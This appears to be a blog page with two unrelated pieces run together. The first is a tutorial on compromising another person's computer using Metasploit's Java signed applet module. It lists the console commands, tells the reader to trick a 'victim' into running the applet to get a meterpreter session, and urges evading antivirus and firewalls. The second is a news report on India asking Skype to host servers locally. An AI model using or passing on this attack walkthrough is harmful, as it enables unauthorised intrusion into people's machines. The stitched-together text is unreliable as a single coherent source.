Pawning Someone's PC with Java Signed Applet Social Engineering Code Execution from Metasploit

Metasploit is one of the greatest open source tools which helps penetration tester's lives easier. In this article I would like to demonstrate how to pawn someone's computer by using the Java Signed Applet Social Engineering Code Execution from the Metasploit Console. To fire up Metasploit, type msfconsole and follow the instructions:

1. Load the exploit plugin:

use exploit/multi/browser/java_signed_applet

2. Set the srvport which is the local port to listen on, by default it is set to port 8080. If you want to change the port use the command (for example port 9191):

set srvport 9191

(In my case I didn't change the port but I still demonstrated from the screenshot below on how to change the srvport to 8080)

3. Set the URL path, in my case I used /gaylink:

set uripath /gaylink

4. Run the exploit with the command below:

exploit

5. Now send the local IP assigned (in my case 192.168.11.2:8080/gaylink) by Metasploit  or the URL to your victim and convince him to click on the alert box (applet) that will popup just like the screenshot below.

If he runs the applet, you should be able to establish a meterpreter session then! Below is a screenshot of a total pawnage :)

Take note that antiviruses and firewalls detect this kind of attack so use your head in evading the antivirus and firewall.

Indian Government to ask Skype, others to set up servers in India: Report

The Indian government will ask popular Internet-based free video calling service Skype and other such applications providers to set their servers in India in order to continue providing their services here. According to a ToI report, the government feels that ‘unregulated Internet architecture in India and highly decentralized encrypted structure of Skype makes it difficult for the security agencies to monitor the service, which could be misused to breach the national security.

The Indian government has thrown a fit earlier over encrypted messenger service by BlackBerry and Internet services like Facebook, Twitter and others, for national security reasons.
Along with this, other Internet related issues were collectively taken up by the representatives of the Indian Intelligence Bureau, other security agencies and the Police force along with senior officials from telecom and IT departments in a home ministry meeting held on April 23.
“Any service provider, who provides communication service in India via any media through Voice-over-Internet Protocol ( VoIP), should be mandated to be registered in India, having its office, server located in the country and therefore, subject to Indian laws. Necessary provisions to this effect may be incorporated through amendment in Indian Telegraph Act, 1885 and Information Technology Act, 2000,” according to the minutes of the meeting held on April 23.
The government wants to able to control the Internet services including social networking sites and the Internet telephony up to an extent that it could limit the usage as well as completely stop access to these service in certain states or zones in the country, depending upon the sensitivity of the area. For this, it will ask mobile device players along with the Internet service providers to ‘segregate Internet Protocol (IP) addresses on a state basis’, which will allow the state government to monitor and better control these services.